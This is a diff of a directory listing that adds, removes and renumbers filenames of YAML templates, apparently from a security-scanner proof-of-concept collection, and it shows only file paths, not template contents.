./poc/other/anual-archive-9a361b8a04b5344c6923b947e14e5de1.yaml ./poc/other/anual-archive-e3376d4b2f2bf202a6fcc995d3f8fb1c.yaml @@ -53988,8 +53988,8 @@ ./poc/other/article2pdf-d8d46052bf000e2dedd2cd559f728d8f.yaml ./poc/other/article2pdf.yaml ./poc/other/articlepublisherpro.yaml -./poc/other/artifactory-anonymous-deploy-547.yaml ./poc/other/artifactory-anonymous-deploy-548.yaml +./poc/other/artifactory-anonymous-deploy-549.yaml ./poc/other/artifactory-anonymous-deploy.yaml ./poc/other/artifactory-workflow.yaml ./poc/other/artifactory_deploy.yaml @@ -54071,6 +54071,7 @@ ./poc/other/aspose-file-download-559.yaml ./poc/other/aspose-file-download-560.yaml ./poc/other/aspose-file-download-561.yaml +./poc/other/aspose-file-download.yaml ./poc/other/aspose-ie-file-download-562.yaml ./poc/other/aspose-ie-file-download-563.yaml ./poc/other/aspose-ie-file-download-564.yaml @@ -54092,9 +54093,10 @@ ./poc/other/aspose-pdf-file-download-567.yaml ./poc/other/aspose-pdf-file-download-568.yaml ./poc/other/aspose-pdf-file-download-569.yaml -./poc/other/aspose-pdf-file-download.yaml +./poc/other/aspose-pdf-file-download-570.yaml ./poc/other/aspose-words-exporter-file-download.yaml ./poc/other/aspose-words-file-download-571.yaml +./poc/other/aspose-words-file-download-572.yaml ./poc/other/aspose-words-file-download-573.yaml ./poc/other/aspose-words-file-download-574.yaml ./poc/other/asproxy.yaml @@ -54416,8 +54418,8 @@ ./poc/other/avenirsoft-directdownload-c99e9b0f5458ecd29a4d8ad66c2e73f1.yaml ./poc/other/avenirsoft-directdownload.yaml ./poc/other/avg-phish.yaml +./poc/other/aviatrix-panel-608.yaml ./poc/other/aviatrix-panel-609.yaml -./poc/other/aviatrix-panel-610.yaml ./poc/other/aviatrix-panel.yaml ./poc/other/aviatrix-workflow.yaml ./poc/other/avideo-install.yaml @@ -54427,7 +54429,7 @@ ./poc/other/avnil-pdf-generator-check.yaml ./poc/other/avocent-dsview.yaml ./poc/other/avtech-avn801-camera-panel-611.yaml -./poc/other/avtech-avn801-camera-panel-613.yaml +./poc/other/avtech-avn801-camera-panel-612.yaml ./poc/other/avtech-avn801-camera-panel.yaml ./poc/other/awake-5a4c808779b61131f00ea6f5bed49fd0.yaml ./poc/other/awake-5fc472d5f8cf004013c5d4188f603f26.yaml @@ -54482,6 +54484,7 @@ ./poc/other/axis-happyaxis-3.yaml ./poc/other/axis-happyaxis-4.yaml ./poc/other/axis-happyaxis-669.yaml +./poc/other/axis-happyaxis-670.yaml ./poc/other/axublog_v1-app-lfr.yaml ./poc/other/axway-securetransport-panel.yaml ./poc/other/axxon-client-panel.yaml @@ -54565,6 +54568,7 @@ ./poc/other/baidu-tongji-generator-693b13b51d019c54e98a155b2b5ed384.yaml ./poc/other/baidu-tongji-generator-c0c3b835a417d629c5f299ab969849a6.yaml ./poc/other/baidu-tongji-generator.yaml +./poc/other/bak.yaml ./poc/other/balkon-d069673e112779a96aeb6209bf69dce0.yaml ./poc/other/balkon.yaml ./poc/other/ban-users-577363bdc084e759bd6a1dc11f3bca46.yaml @@ -54626,6 +54630,7 @@ ./poc/other/baseurl.yaml ./poc/other/bash-scanner.yaml ./poc/other/basic-cors-692.yaml +./poc/other/basic-cors-693.yaml ./poc/other/basic-cors-694.yaml ./poc/other/basic-cors-flash.yaml ./poc/other/basic-cors.yaml @@ -54984,14 +54989,13 @@ ./poc/other/bitrix-log-file-found.yaml ./poc/other/bitrix-panel-746.yaml ./poc/other/bitrix-panel-747.yaml -./poc/other/bitrix-panel-748.yaml ./poc/other/bitrix-panel-749.yaml +./poc/other/bitrix-panel-750.yaml ./poc/other/bitrix-panel.yaml ./poc/other/bitrix-registration.yaml ./poc/other/bitrix-site-manager.yaml ./poc/other/bitrix-workflow.yaml ./poc/other/bitrix24-installer.yaml -./poc/other/bitrix_bak_check.yaml ./poc/other/bitrix_content_spoofing_ajax.yaml ./poc/other/bitrix_content_spoofing_imagepg.yaml ./poc/other/bitwarden-phish.yaml @@ -55667,6 +55671,7 @@ ./poc/other/bubble-menu-825844feae3c0993ba26ca24f6beb496.yaml ./poc/other/bubble-menu-954097b83211a929d7262429b922e34b.yaml ./poc/other/bubble-menu.yaml +./poc/other/buddy-panel-796.yaml ./poc/other/buddy-panel.yaml ./poc/other/buddy-panel.yml ./poc/other/buddybadges-14c7b37e2a39ea3c10caf2185d80b202.yaml @@ -56066,8 +56071,8 @@ ./poc/other/cacti-weathermap-file-write-1.yaml ./poc/other/cacti-weathermap-file-write-2.yaml ./poc/other/cacti-weathermap-file-write-830.yaml +./poc/other/cacti-weathermap-file-write-831.yaml ./poc/other/cacti-weathermap-file-write-832.yaml -./poc/other/cacti-weathermap-file-write-833.yaml ./poc/other/cacti-weathermap-file-write.yaml ./poc/other/cacti-weathermap-file-write.yml ./poc/other/cacti-workflow-834.yaml @@ -56152,6 +56157,7 @@ ./poc/other/campaign-url-builder-plugin.yaml ./poc/other/campaign-url-builder.yaml ./poc/other/campaignmonitor-842.yaml +./poc/other/campaignmonitor-843.yaml ./poc/other/campaignmonitor-844.yaml ./poc/other/campaignmonitor.yaml ./poc/other/campsite.yaml @@ -56164,7 +56170,6 @@ ./poc/other/campus-directory-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/campus-directory-plugin.yaml ./poc/other/campus-directory.yaml -./poc/other/can-i-take-over-dns-852.yaml ./poc/other/can-i-take-over-dns.yaml ./poc/other/canal-admin.yaml ./poc/other/cancosoft-asset-management.yaml @@ -56514,8 +56519,8 @@ ./poc/other/cerberus-helpdesk.yaml ./poc/other/cerberus-malware.yaml ./poc/other/cerebro-panel-878.yaml +./poc/other/cerebro-panel-879.yaml ./poc/other/cerebro-panel-880.yaml -./poc/other/cerebro-panel-881.yaml ./poc/other/cerebro-panel.yaml ./poc/other/cerebro.yaml ./poc/other/certificate-validation-882.yaml @@ -56613,8 +56618,8 @@ ./poc/other/cgc-maintenance-mode-464f8430e2fff38b86ea4b4f98c58fe0.yaml ./poc/other/cgc-maintenance-mode-d395c79f773ee5d70312487be14f72dc.yaml ./poc/other/cgc-maintenance-mode.yaml +./poc/other/cgi-printenv-885.yaml ./poc/other/cgi-printenv-886.yaml -./poc/other/cgi-printenv.yaml ./poc/other/cgi-test-page-888.yaml ./poc/other/cgi-test-page-889.yaml ./poc/other/cgi-test-page-890.yaml @@ -56751,8 +56756,8 @@ ./poc/other/check-point-vpn.yaml ./poc/other/checklist-92daf0c22f2e0955e6c9149f022c0728.yaml ./poc/other/checklist.yaml +./poc/other/checkmarx-panel-895.yaml ./poc/other/checkmarx-panel-896.yaml -./poc/other/checkmarx-panel-897.yaml ./poc/other/checkmarx-panel.yaml ./poc/other/checkout-for-paypal-628c476d3536033000fc1b97975c6b54.yaml ./poc/other/checkout-for-paypal.yaml @@ -56761,15 +56766,14 @@ ./poc/other/checkpoint-panel-1.yaml ./poc/other/checkpoint-panel-2.yaml ./poc/other/checkpoint-panel-898.yaml -./poc/other/checkpoint-panel-899.yaml ./poc/other/checkpoint-panel.yaml ./poc/other/checkpoint-workflow.yaml ./poc/other/chelen-system.yaml ./poc/other/chenrui-video-security-access-system.yaml ./poc/other/cherokee-workflow.yaml ./poc/other/cherokee.yaml +./poc/other/cherry-file-download-900.yaml ./poc/other/cherry-file-download-901.yaml -./poc/other/cherry-file-download.yaml ./poc/other/cherry-plugin-312dafc960d23302b021c32b1a44b2c5.yaml ./poc/other/cherry-plugin-a9213c2233aae060e088a28f73ceff40.yaml ./poc/other/cherry-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -56971,7 +56975,7 @@ ./poc/other/clearfy-plugin.yaml ./poc/other/clearfy.yaml ./poc/other/clearpass-policy-manager-1000.yaml -./poc/other/clearpass-policy-manager-997.yaml +./poc/other/clearpass-policy-manager-1001.yaml ./poc/other/clearpass-policy-manager-998.yaml ./poc/other/clearpass-policy-manager-999.yaml ./poc/other/clearpass-policy-manager.yaml @@ -57039,6 +57043,7 @@ ./poc/other/client-portal-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/client-portal-plugin.yaml ./poc/other/client-portal.yaml +./poc/other/clientaccesspolicy-1006.yaml ./poc/other/clientaccesspolicy-1007.yaml ./poc/other/clientaccesspolicy.yaml ./poc/other/clientexec.yaml @@ -57168,6 +57173,7 @@ ./poc/other/cmyee-momentopress-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/cmyee-momentopress-plugin.yaml ./poc/other/cmyee-momentopress.yaml +./poc/other/cname-fingerprint-1030.yaml ./poc/other/cname-fingerprint.yaml ./poc/other/cname-provider-assessment.yaml ./poc/other/cname-service.yaml @@ -57228,7 +57234,7 @@ ./poc/other/codeigniter-env-1.yaml ./poc/other/codeigniter-env-10.yaml ./poc/other/codeigniter-env-11.yaml -./poc/other/codeigniter-env-1134.yaml +./poc/other/codeigniter-env-1133.yaml ./poc/other/codeigniter-env-12.yaml ./poc/other/codeigniter-env-2.yaml ./poc/other/codeigniter-env-3.yaml @@ -57285,6 +57291,7 @@ ./poc/other/cogent-datahub.yaml ./poc/other/colasoft-mdp.yaml ./poc/other/colasoft-tsa.yaml +./poc/other/cold-fusion-cfcache-map-1149.yaml ./poc/other/cold-fusion-cfcache-map-1150.yaml ./poc/other/cold-fusion-cfcache-map-1151.yaml ./poc/other/cold-fusion-cfcache-map.yaml @@ -57456,7 +57463,6 @@ ./poc/other/community-events.yaml ./poc/other/compal-panel-1165.yaml ./poc/other/compal-panel.yaml -./poc/other/compal.yaml ./poc/other/companion-auto-update-02d6d09566c18c54d4c5e559e1f141df.yaml ./poc/other/companion-auto-update-1edea1f7e2402867189528ca77cfcaba.yaml ./poc/other/companion-auto-update-4523308d7d068021a1f50b479e587f6f.yaml @@ -57521,12 +57527,13 @@ ./poc/other/computer-repair-shop-plugin.yaml ./poc/other/computer-repair-shop.yaml ./poc/other/comtrend-ct5367-remote-root.yaml +./poc/other/concourse-ci-panel-1169.yaml ./poc/other/concourse-ci-panel.yaml ./poc/other/concourse-ci-panel.yml ./poc/other/concrete-installer.yaml ./poc/other/concrete-workflow.yaml ./poc/other/concrete5-install.yaml -./poc/other/concrete5-panel-1172.yaml +./poc/other/concrete5-panel-1173.yaml ./poc/other/concrete5-panel.yaml ./poc/other/conditional-menus.yaml ./poc/other/coneblog-widgets-bc060695098fbf1df6eb67d564047f66.yaml @@ -57837,8 +57844,8 @@ ./poc/other/content-repeater.yaml ./poc/other/content-restrictor-for-divi-d719c21b3b083cea6a66583de9da5dde.yaml ./poc/other/content-restrictor-for-divi.yaml +./poc/other/content-scheme-1204.yaml ./poc/other/content-scheme-1205.yaml -./poc/other/content-scheme-1206.yaml ./poc/other/content-scheme.yaml ./poc/other/content-security-policy.yaml ./poc/other/content-slide-4c5b22ffe296ecfe334bdddc31a2e742.yaml @@ -58374,7 +58381,7 @@ ./poc/other/cross-rss.yaml ./poc/other/crossdomain-xml-1267.yaml ./poc/other/crossdomain-xml-1268.yaml -./poc/other/crossdomain-xml.yaml +./poc/other/crossdomain-xml-1269.yaml ./poc/other/crossdomin-xml.yaml ./poc/other/crswh.yaml ./poc/other/crxde-lite-1276.yaml @@ -58411,9 +58418,9 @@ ./poc/other/cryptocurrency-widgets-pack-df87c30565c27eb58e0271f0dfd6d08b.yaml ./poc/other/cryptocurrency-widgets-pack.yaml ./poc/other/cryptocurrency.yaml -./poc/other/csod-panel-1286.yaml ./poc/other/csod-panel-1287.yaml ./poc/other/csod-panel-1288.yaml +./poc/other/csod-panel-1289.yaml ./poc/other/csod-panel.yaml ./poc/other/csp-bypass.yaml ./poc/other/cspp-bracket-firstparam.yaml @@ -58760,11 +58767,11 @@ ./poc/other/d-link-arbitary-fileread-7042.yaml ./poc/other/d-link-arbitary-fileread-7043.yaml ./poc/other/d-link-arbitary-fileread-7044.yaml -./poc/other/d-link-arbitary-fileread-7045.yaml ./poc/other/d-link-arbitary-fileread-7046.yaml ./poc/other/d-link-wireless-7047.yaml ./poc/other/d-link-wireless-7048.yaml ./poc/other/d-link-wireless-7049.yaml +./poc/other/d-link-wireless-7050.yaml ./poc/other/d-link-wireless.yaml ./poc/other/d-link.yaml ./poc/other/da-reactions-217390210478aa0587f5e7f241b1af34.yaml @@ -58896,6 +58903,7 @@ ./poc/other/dd-post-carousel.yaml ./poc/other/dd-rating-abefceeefb99cff148ca67c77873866d.yaml ./poc/other/dd-rating.yaml +./poc/other/dead-host-with-cname-6786.yaml ./poc/other/dead-host-with-cname.yaml ./poc/other/deal-of-the-day-ff9293ba28748efa2ab9a2fe77385468.yaml ./poc/other/deal-of-the-day.yaml @@ -58966,7 +58974,7 @@ ./poc/other/delivery-woo-ff9293ba28748efa2ab9a2fe77385468.yaml ./poc/other/delivery-woo.yaml ./poc/other/dell-edgemax-edgeos-router.yaml -./poc/other/dell-idrac-workflow.yaml +./poc/other/dell-idrac-workflow-6947.yaml ./poc/other/dell-idrac.yaml ./poc/other/dell-n1108p-on.yaml ./poc/other/dell-networker-management-console.yaml @@ -59018,6 +59026,7 @@ ./poc/other/depicter-cd536ae4f4d99d9b5aa3852213f0cd63.yaml ./poc/other/depicter.yaml ./poc/other/deprecated-tls-6957.yaml +./poc/other/deprecated-tls-6958.yaml ./poc/other/deprecated-tls-6959.yaml ./poc/other/deprecated-tls.yaml ./poc/other/deshang-dsmall.yaml @@ -59048,7 +59057,6 @@ ./poc/other/development-logs-1.yaml ./poc/other/development-logs-2.yaml ./poc/other/development-logs-3.yaml -./poc/other/development-logs-6987.yaml ./poc/other/development-logs-6989.yaml ./poc/other/development-logs.yaml ./poc/other/devformatter-0473642f46ba628f35ee6f5a15e577ba.yaml @@ -59081,6 +59089,7 @@ ./poc/other/dialogs-plugin.yaml ./poc/other/dialogs.yaml ./poc/other/dian-diagnostics.yaml +./poc/other/diaowen-fileread.yaml ./poc/other/diaowen-system.yaml ./poc/other/diary-31eb77eaefc61e112478e9f1952e822d.yaml ./poc/other/diary-9099a88f255af571eb05254581f8054d.yaml @@ -59261,6 +59270,7 @@ ./poc/other/dmxready-portfolio-manager.yaml ./poc/other/dnp-firewall.yaml ./poc/other/dns-multiple-example.yaml +./poc/other/dns-value-share-template-3.yaml ./poc/other/docebo-elearning-panel.yaml ./poc/other/docket-cache-29d289a525039ca1604e348c45bb194f.yaml ./poc/other/docket-cache-9d3b68fb0167e0f3e4bf3e86cef87a84.yaml @@ -59320,7 +59330,6 @@ ./poc/other/domcfg-page-7074.yaml ./poc/other/domcfg-page-7075.yaml ./poc/other/domcfg-page-7076.yaml -./poc/other/domcfg-page-7077.yaml ./poc/other/domcfg-page.yaml ./poc/other/dominoconsole.yaml ./poc/other/don8-a7ff6c950fec57e9a71ac919aefe0d85.yaml @@ -59604,11 +59613,11 @@ ./poc/other/druid-panel.yaml ./poc/other/ds-site-message-875e5ff5a57ff63bfa2f151fee3c096b.yaml ./poc/other/ds-site-message.yaml -./poc/other/ds-store-file.yaml ./poc/other/ds-store-leak.yaml ./poc/other/ds-suit-ff9293ba28748efa2ab9a2fe77385468.yaml ./poc/other/ds-suit.yaml ./poc/other/ds_store-7118.yaml +./poc/other/ds_store-7119.yaml ./poc/other/ds_store.yaml ./poc/other/dsgvo-youtube-ab2720de0d52a7fa9590416e9523d9f9.yaml ./poc/other/dsgvo-youtube.yaml @@ -59769,8 +59778,6 @@ ./poc/other/dx-watermark-3bef3aced10727d0ec75e98bd1b40fca.yaml ./poc/other/dx-watermark.yaml ./poc/other/dxplanning-panel.yaml -./poc/other/dynamic-broadcast-receiver-7140.yaml -./poc/other/dynamic-broadcast-receiver-7141.yaml ./poc/other/dynamic-broadcast-receiver-7142.yaml ./poc/other/dynamic-broadcast-receiver.yaml ./poc/other/dynamic-content-for-elementor-74b47d0324febbea267a2d8f675a7149.yaml @@ -60811,6 +60818,7 @@ ./poc/other/environment-rb.yaml ./poc/other/envision-gateway-7226.yaml ./poc/other/envision-gateway-7227.yaml +./poc/other/envision-gateway.yaml ./poc/other/envo-business-157cf14a019f2f39567d396451ba436d.yaml ./poc/other/envo-business-709fcd2d01e6508e0448c347b88dab61.yaml ./poc/other/envo-business-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -60837,7 +60845,7 @@ ./poc/other/eprolo-dropshipping-1b79774a92954a45cd2bc5695d909dd6.yaml ./poc/other/eprolo-dropshipping.yaml ./poc/other/epson-wf-series-7243.yaml -./poc/other/epson-wf-series.yaml +./poc/other/epson-wf-series-7244.yaml ./poc/other/eptonic-167319f8a8078a9d01ccba879b9a1d96.yaml ./poc/other/eptonic-77b88fb79ff362d0cb5b37a0fa99098f.yaml ./poc/other/eptonic-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -60906,7 +60914,6 @@ ./poc/other/error-logs-5.yaml ./poc/other/error-logs-6.yaml ./poc/other/error-logs-7.yaml -./poc/other/error-logs-7251.yaml ./poc/other/error-logs-7253.yaml ./poc/other/error-logs-7254.yaml ./poc/other/error-logs-7255.yaml @@ -61574,7 +61581,9 @@ ./poc/other/eyelock-nano-lfd-7373.yaml ./poc/other/eyelock-nano-lfd-7374.yaml ./poc/other/eyelock-nano-lfd-7375.yaml +./poc/other/eyelock-nano-lfd-7376.yaml ./poc/other/eyelock-nano-lfd-7377.yaml +./poc/other/eyelock-nano-lfd.yaml ./poc/other/eyes-only-user-access-shortcode.yaml ./poc/other/eyou-anti-spam-mailbox-firewall.yaml ./poc/other/eyou-email-system.yaml @@ -61595,6 +61604,7 @@ ./poc/other/f-secure-policy-manager-7560.yaml ./poc/other/f-secure-policy-manager-7561.yaml ./poc/other/f-secure-policy-manager-7562.yaml +./poc/other/f-secure-policy-manager-7563.yaml ./poc/other/f-secure-policy-manager.yaml ./poc/other/f4-improvements.yaml ./poc/other/f5-big-ip.yaml @@ -61892,6 +61902,7 @@ ./poc/other/file-manager-plugin.yaml ./poc/other/file-manager.yaml ./poc/other/file-scheme-7467.yaml +./poc/other/file-scheme-7469.yaml ./poc/other/file-scheme.yaml ./poc/other/filebird-61cf2f1a37771fa3cda817355d5faa22.yaml ./poc/other/filebird-93489ce87ac06cba07d9ef3c6ed8ff81.yaml @@ -62006,6 +62017,7 @@ ./poc/other/firebase-messaging.yaml ./poc/other/firebase-urls-7497.yaml ./poc/other/firebase-urls-7498.yaml +./poc/other/firebase-urls-7499.yaml ./poc/other/firebase-urls-7500.yaml ./poc/other/firebase_urls.yaml ./poc/other/firebird.yaml @@ -62172,7 +62184,7 @@ ./poc/other/flickr-rss-f25c2ec762050f888637025a502c4535.yaml ./poc/other/flickr-rss.yaml ./poc/other/flightlog.yaml -./poc/other/flightpath-panel-7508.yaml +./poc/other/flightpath-panel-7507.yaml ./poc/other/flightpath-panel.yaml ./poc/other/flipbook-20d45caa785d786dc55eed7fac85362c.yaml ./poc/other/flipbook-80ac42d840dc1f93486448665b54a6a8.yaml @@ -62594,10 +62606,8 @@ ./poc/other/fortinet-ensilo.yaml ./poc/other/fortinet-firewall.yaml ./poc/other/fortinet-fortiddos-panel.yaml -./poc/other/fortinet-fortigate-panel-7533.yaml ./poc/other/fortinet-fortigate-panel-7534.yaml ./poc/other/fortinet-fortigate-panel-7535.yaml -./poc/other/fortinet-fortigate-panel-7536.yaml ./poc/other/fortinet-fortigate-panel.yaml ./poc/other/fortinet-fortigate.yaml ./poc/other/fortinet-fortiguard.yaml @@ -62636,6 +62646,7 @@ ./poc/other/fotography.yaml ./poc/other/fotomoto.yaml ./poc/other/foulenzer-advanced.yaml +./poc/other/foulenzer-subdomain-tk (copy 1).yaml ./poc/other/foulenzer-subdomain-tk.yaml ./poc/other/foulenzer-tech.yaml ./poc/other/founder-all-media-editing-system.yaml @@ -63443,6 +63454,8 @@ ./poc/other/glpi-panel.yaml ./poc/other/glpi-workflow.yaml ./poc/other/glpi.yaml +./poc/other/glpidirectorylisting(1).yaml +./poc/other/glpidirectorylisting.yaml ./poc/other/gm-electronic-security-document-management-system.yaml ./poc/other/gm-woo-product-list-widget.yaml ./poc/other/gmace-7ef7e724eb581f2cfafd10fb8c3c24f7.yaml @@ -63481,7 +63494,7 @@ ./poc/other/gocodes.yaml ./poc/other/gocron-panel.yaml ./poc/other/gogs-panel.yaml -./poc/other/gogs-workflow-7760.yaml +./poc/other/gogs-workflow.yaml ./poc/other/gogs.yaml ./poc/other/golang-metrics.yaml ./poc/other/golangci-lint.yml @@ -63857,7 +63870,6 @@ ./poc/other/haproxy-exporter-metrics.yaml ./poc/other/haproxy-report.yaml ./poc/other/haproxy-stat.yaml -./poc/other/haproxy-status-7883.yaml ./poc/other/haproxy-status-7884.yaml ./poc/other/haproxy-status-7885.yaml ./poc/other/harbor-panel.yaml @@ -63935,7 +63947,6 @@ ./poc/other/heat-trackr.yaml ./poc/other/heatmiser-wifi-thermostat-7923.yaml ./poc/other/heatmiser-wifi-thermostat-7924.yaml -./poc/other/heatmiser-wifi-thermostat.yaml ./poc/other/hejia-oa.yaml ./poc/other/hello-dolly.yaml ./poc/other/hello-elementor-4871f7fef9821ad7021876ca49006f78.yaml @@ -64013,7 +64024,7 @@ ./poc/other/hikvision-gateway-data-file-read.yaml ./poc/other/hikvision-iSecureCenter-fileread.yaml ./poc/other/hikvision-info-leak-7957.yaml -./poc/other/hikvision-info-leak.yaml +./poc/other/hikvision-info-leak-7958.yaml ./poc/other/hikvision-info-leak.yml ./poc/other/hikvision-ip-camera.yaml ./poc/other/hikvision-isecure-center.yaml @@ -64040,7 +64051,7 @@ ./poc/other/hitachi-virtual-storage-platform.yaml ./poc/other/hitron-technologies-7959.yaml ./poc/other/hitron-technologies-7960.yaml -./poc/other/hitron-technologies-7961.yaml +./poc/other/hitron-technologies-7962.yaml ./poc/other/hitron-technologies.yaml ./poc/other/hitsteps-visitor-manager-a4f14bcf46b90bf05fd86abc01d72e3e.yaml ./poc/other/hitsteps-visitor-manager-fc2fce71ebba70ebb2a3e464a40cd489.yaml @@ -64086,6 +64097,7 @@ ./poc/other/holler-box.yaml ./poc/other/hollysys-mes.yaml ./poc/other/home-assistant-7979.yaml +./poc/other/home-assistant-7980.yaml ./poc/other/home-assistant-panel.yaml ./poc/other/home-assistant.yaml ./poc/other/homebridge-panel.yaml @@ -64185,7 +64197,6 @@ ./poc/other/hover-image-e58166fa5204a405e1e321e94bba66de.yaml ./poc/other/hover-image.yaml ./poc/other/hp-3com-officeconnect-vpn-firewall.yaml -./poc/other/hp-ilo-5-8018.yaml ./poc/other/hp-ilo-5-8019.yaml ./poc/other/hp-ilo-5-8020.yaml ./poc/other/hp-ilo-5.yaml @@ -64317,6 +64328,7 @@ ./poc/other/huawei-esight.yaml ./poc/other/huawei-fusioncloud-desktop.yaml ./poc/other/huawei-fusioncompute.yaml +./poc/other/huawei-hg532e-panel-8065.yaml ./poc/other/huawei-hg532e-panel-8066.yaml ./poc/other/huawei-hg532e-panel.yaml ./poc/other/huawei-home-gateway-hg659-fileread.yaml @@ -64347,8 +64359,6 @@ ./poc/other/huijietong-cloud-fileread-8082.yaml ./poc/other/huijietong-cloud-fileread-8083.yaml ./poc/other/huijietong-cloud-fileread-8084.yaml -./poc/other/huijietong-cloud-fileread-8085.yaml -./poc/other/huijietong-cloud-fileread-8086.yaml ./poc/other/huijietong-cloud-fileread-8087.yaml ./poc/other/hummingbird-performance-1d4c893623ab0507c01647e1f1aef048.yaml ./poc/other/hummingbird-performance-3a7dcccc0d3fd5b9007fbcfe6711c67b.yaml @@ -64479,7 +64489,7 @@ ./poc/other/ideapush.yaml ./poc/other/identity-services-engine-1.yaml ./poc/other/identity-services-engine-2.yaml -./poc/other/identity-services-engine-8145.yaml +./poc/other/identity-services-engine-8144.yaml ./poc/other/identity-services-engine-8146.yaml ./poc/other/identity-services-engine.yaml ./poc/other/identityguard-selfservice-entrust-8143.yaml @@ -64556,6 +64566,7 @@ ./poc/other/iis-enumxaspnetversion.yaml ./poc/other/iis-put-getshell.yaml ./poc/other/iis-put-getshell.yml +./poc/other/iis-shortname-8151.yaml ./poc/other/iis-shortname-8152.yaml ./poc/other/iis-shortname-8153.yaml ./poc/other/iis-shortname.yaml @@ -65114,6 +65125,7 @@ ./poc/other/internet-cluster-manager.yaml ./poc/other/internet-service-8176.yaml ./poc/other/internet-service-8177.yaml +./poc/other/internet-service.yaml ./poc/other/interred.yaml ./poc/other/interstingExtensions.yaml ./poc/other/intimate-io-cryptocurrency-payments-4a3a4bb7607630077f49d04dfa8de691.yaml @@ -65178,8 +65190,8 @@ ./poc/other/iomega-emc-shared-nas.yaml ./poc/other/ioncube-loader-wizard-1.yaml ./poc/other/ioncube-loader-wizard-2.yaml -./poc/other/ioncube-loader-wizard-8184.yaml ./poc/other/ioncube-loader-wizard-8185.yaml +./poc/other/ioncube-loader-wizard.yaml ./poc/other/ip-address-blocker-cf3deb5853fcc9bf0fb6884ebcfb1b2c.yaml ./poc/other/ip-address-blocker-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/ip-address-blocker-ec37b7ce9c9dfbe3f794b9e8b130ae7f.yaml @@ -65314,6 +65326,7 @@ ./poc/other/jaeger-ui-dashboard.yaml ./poc/other/jakarta-project.yaml ./poc/other/jamf-panel-8215.yaml +./poc/other/jamf-panel-8216.yaml ./poc/other/jamf-panel-8217.yaml ./poc/other/jamf-panel.yaml ./poc/other/jamf-pro-log4j.yaml @@ -65491,9 +65504,9 @@ ./poc/other/jewelry-store-theme-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/jewelry-store-theme.yaml ./poc/other/jewelry-store.yaml +./poc/other/jfrog-8303.yaml ./poc/other/jfrog-8304.yaml ./poc/other/jfrog-8305.yaml -./poc/other/jfrog-8306.yaml ./poc/other/jfrog.yaml ./poc/other/jh-404-logger.yaml ./poc/other/jianhengxinan-jh-las.yaml @@ -65520,6 +65533,7 @@ ./poc/other/jivochat-66d916ce8710707a6a59f9da36d85732.yaml ./poc/other/jivochat.yaml ./poc/other/jixian-oa-video-file-file-read.yaml +./poc/other/jkstatus-manager-8344.yaml ./poc/other/jkstatus-manager-8345.yaml ./poc/other/jkstatus-manager-8346.yaml ./poc/other/jkstatus-manager.yaml @@ -65529,7 +65543,6 @@ ./poc/other/jmx-console-8350.yaml ./poc/other/jmx-console-8351.yaml ./poc/other/jmx-console-8352.yaml -./poc/other/jmx-console-8353.yaml ./poc/other/jmx-console.yaml ./poc/other/jnews-edf2392b68ac3fa89210511685b2df12.yaml ./poc/other/jnews.yaml @@ -65613,7 +65626,6 @@ ./poc/other/jolokia-8367.yaml ./poc/other/jolokia-8369.yaml ./poc/other/jolokia-file-read-compilerdirectivesadd.yaml -./poc/other/jolokia-list-8360.yaml ./poc/other/jolokia-list-8361.yaml ./poc/other/jolokia-list.yaml ./poc/other/jolokia.yaml @@ -65701,6 +65713,7 @@ ./poc/other/jupiterx-core.yaml ./poc/other/jupiterx.yaml ./poc/other/jupyter-notebook-8406.yaml +./poc/other/jupyter-notebook-8407.yaml ./poc/other/jupyter-notebook.yaml ./poc/other/jupyterhub.yaml ./poc/other/jurassic-application-management-system.yaml @@ -65825,10 +65838,9 @@ ./poc/other/kento-post-view-counter-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/kento-post-view-counter-plugin.yaml ./poc/other/kento-post-view-counter.yaml -./poc/other/keo-klr300n-install.yaml ./poc/other/keo-router-klr300n.yaml +./poc/other/kerio-connect-client-8450.yaml ./poc/other/kerio-connect-client-8451.yaml -./poc/other/kerio-connect-client-8452.yaml ./poc/other/kerio-connect-client.yaml ./poc/other/kerio-connect.yaml ./poc/other/kerio-mailserver.yaml @@ -65931,6 +65943,7 @@ ./poc/other/klaviyo.yaml ./poc/other/kleeja.yaml ./poc/other/kloxo-single-server.yaml +./poc/other/klr300n-installer.yaml ./poc/other/klr300n-panel.yaml ./poc/other/kn-fix-your.yaml ./poc/other/knews-0a48a832408c3f273ceb312969a27b11.yaml @@ -66011,11 +66024,12 @@ ./poc/other/kraken-image-optimizer.yaml ./poc/other/kuaipu-m6.yaml ./poc/other/kubelet-healthz-8518.yaml +./poc/other/kubelet-healthz-8519.yaml +./poc/other/kubelet-healthz.yaml ./poc/other/kubelet-metrics-8520.yaml ./poc/other/kubelet-metrics-8521.yaml ./poc/other/kubelet-pods-8522.yaml ./poc/other/kubelet-pods-8523.yaml -./poc/other/kubelet-pods.yaml ./poc/other/kubelet-runningpods-8524.yaml ./poc/other/kubelet-runningpods-8525.yaml ./poc/other/kubelet-scan.yaml @@ -66169,6 +66183,7 @@ ./poc/other/layerslider-d44b8ea75cad86672971e33e448252ae.yaml ./poc/other/layerslider-f3ecb8d62bc2131c985e845ff10bc1ba.yaml ./poc/other/layerslider-f9f608fb58ba858f02ea137feee1335f.yaml +./poc/other/layerslider-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/layerslider.yaml ./poc/other/layouts-for-elementor-92382575587b798b515431439d2ad9eb.yaml ./poc/other/layouts-for-elementor.yaml @@ -66397,7 +66412,6 @@ ./poc/other/lenovo-thinkserver.yaml ./poc/other/lenovo-防火墙.yaml ./poc/other/leostream-panel-8609.yaml -./poc/other/leostream-panel-8610.yaml ./poc/other/leostream-panel.yaml ./poc/other/lepus.yaml ./poc/other/lets-box-3895a941d302a032efa55494d4744b20.yaml @@ -66655,9 +66669,9 @@ ./poc/other/livesync-5c2e7820222f361021a99fd46b35e830.yaml ./poc/other/livesync.yaml ./poc/other/liveview-axis-camera-8645.yaml -./poc/other/liveview-axis-camera-8646.yaml ./poc/other/liveview-axis-camera-8647.yaml ./poc/other/liveview-axis-camera-8648.yaml +./poc/other/liveview-axis-camera.yaml ./poc/other/livezilla.yaml 